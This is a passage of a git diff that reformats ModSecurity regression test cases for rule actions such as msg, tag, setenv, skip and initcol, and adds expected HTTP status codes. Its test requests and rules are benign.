2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "action-id.json. Line: 2. Column: 56. Expecting an action, got: id:'1,phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:'1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (6/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (6/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "action-id.json. Line: 2. Column: 56. Expecting an action, got: ',phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:1',phase:2,pass,t:trim\"" ] diff --git a/test/test-cases/regression/action-initcol.json b/test/test-cases/regression/action-initcol.json index 5051f2e6a5..65498e6eb7 100644 --- a/test/test-cases/regression/action-initcol.json +++ b/test/test-cases/regression/action-initcol.json @@ -1,30 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing initcol action", - "expected":{ - "debug_log": "Saving variable: IP:auth_attempt with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing initcol action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: IP:auth_attempt with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setvar:tx.ua_hash=%{matched_var},nolog,pass\"", "SecRule &TX:REAL_IP \"@eq 0\" \"id:'900021',phase:1,t:none,initcol:global=global,initcol:ip=%{remote_addr}_%{tx.ua_hash},setvar:tx.real_ip=%{remote_addr},nolog,pass\"", diff --git a/test/test-cases/regression/action-msg.json b/test/test-cases/regression/action-msg.json index 6933be8aa5..620253ea59 100644 --- a/test/test-cases/regression/action-msg.json +++ b/test/test-cases/regression/action-msg.json @@ -1,115 +1,117 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: msg (this test is not really testing it)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: msg (this test is not really testing it)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, - { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: msg - variable expansion", - "client":{ - "ip":"200.249.12.31", - "port":2313 + { + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: msg - variable expansion", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test: PHPSESSID ops", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test: PHPSESSID ops", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@rx PHPSESSID\" \"id:1,capture,t:lowercase,t:none,msg:'This is a test: %{TX.0}% ops'\"", "SecRule TX \"@rx to_test\" \"id:2,t:lowercase,capture,t:none\"" diff --git a/test/test-cases/regression/action-setenv.json b/test/test-cases/regression/action-setenv.json index 2bbe967a4d..3f6361ea5e 100644 --- a/test/test-cases/regression/action-setenv.json +++ b/test/test-cases/regression/action-setenv.json @@ -1,93 +1,129 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setsid action (1/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "enabled": 1, + "version_min": 300000, + "title": "Testing setsid action (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:'variable=%{matched_var}',pass\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing setenv action (2/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "enabled": 1, + "version_min": 300000, + "title": "Testing setenv action (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:variable=%{matched_var},pass\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing setenv action (3/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120==test=test" + "enabled": 1, + "version_min": 300000, + "title": "Testing setenv action (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120==test=test", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:variable=%{matched_var}==test=test,pass\"" ] diff --git a/test/test-cases/regression/action-setrsc.json b/test/test-cases/regression/action-setrsc.json index ffc4e0f226..23e1594e04 100644 --- a/test/test-cases/regression/action-setrsc.json +++ b/test/test-cases/regression/action-setrsc.json @@ -1,31 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setrsc action", - "expected":{ - "debug_log": "Saving variable: RESOURCE:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setrsc action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: RESOURCE:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setrsc:'test',nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:RESOURCE.score=+10\"", diff --git a/test/test-cases/regression/action-setsid.json b/test/test-cases/regression/action-setsid.json index 2d4e2cddfd..20e5053947 100644 --- a/test/test-cases/regression/action-setsid.json +++ b/test/test-cases/regression/action-setsid.json @@ -1,31 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setsid action", - "expected":{ - "debug_log": "Saving variable: SESSION:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setsid action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: SESSION:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setsid:%{REQUEST_COOKIES:PHPSESSID}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:SESSION.score=+10\"", diff --git a/test/test-cases/regression/action-setuid.json b/test/test-cases/regression/action-setuid.json index 726efd1e64..f12d146dad 100644 --- a/test/test-cases/regression/action-setuid.json +++ b/test/test-cases/regression/action-setuid.json @@ -1,31 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setuid action", - "expected":{ - "debug_log": "Saving variable: USER:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setuid action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: USER:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setuid:%{REQUEST_COOKIES:USER}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:USER.score=+10\"", diff --git a/test/test-cases/regression/action-skip.json b/test/test-cases/regression/action-skip.json index cb7ba14918..73e7136b16 100644 --- a/test/test-cases/regression/action-skip.json +++ b/test/test-cases/regression/action-skip.json @@ -1,31 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 1/3", - "expected":{ - "debug_log": "\\[9\\] Skipped rule id \\'2\\' due to a \\`skip\\' action." + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 1/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "\\[9\\] Skipped rule id \\'2\\' due to a \\`skip\\' action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:1\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", @@ -34,32 +46,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 2/3", - "expected":{ - "parser_error": "Rules error. File: action-skip.json. Line: 2. Column: 71. Expecting an action, got: skip:abc" + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 2/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200, + "parser_error": "Rules error. File: action-skip.json. Line: 2. Column: 71. Expecting an action, got: skip:abc" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:abc\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", @@ -68,32 +92,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 3/3", - "expected":{ - "debug_log": "\\[9\\] Skipped rule id \\'3\\' due to a \\`skip\\' action." + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 3/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "\\[9\\] Skipped rule id \\'3\\' due to a \\`skip\\' action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:2\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", diff --git a/test/test-cases/regression/action-tag.json b/test/test-cases/regression/action-tag.json index 870297b462..58e1dfb3ad 100644 --- a/test/test-cases/regression/action-tag.json +++ b/test/test-cases/regression/action-tag.json @@ -1,115 +1,117 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: tag 1", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: tag 1", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Rule tag: teste", - "error_log":"" + "expected": { + "debug_log": "Rule tag: teste", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste',t:lowercase,t:none\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: tag 2", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: tag 2", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Rule tag: teste no-cache", - "error_log":"" + "expected": { + "debug_log": "Rule tag: teste no-cache", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste %{REQUEST_HEADERS:Pragma}%',t:lowercase,t:none\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/action-tnf-base64.json b/test/test-cases/regression/action-tnf-base64.json index 157ddde3c7..d43f380d9d 100644 --- a/test/test-cases/regression/action-tnf-base64.json +++ b/test/test-cases/regression/action-tnf-base64.json @@ -1,88 +1,90 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Transformatio :: base64 (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Transformatio :: base64 (1/2)", + "client": { + "ip": "200.249.12.31", + 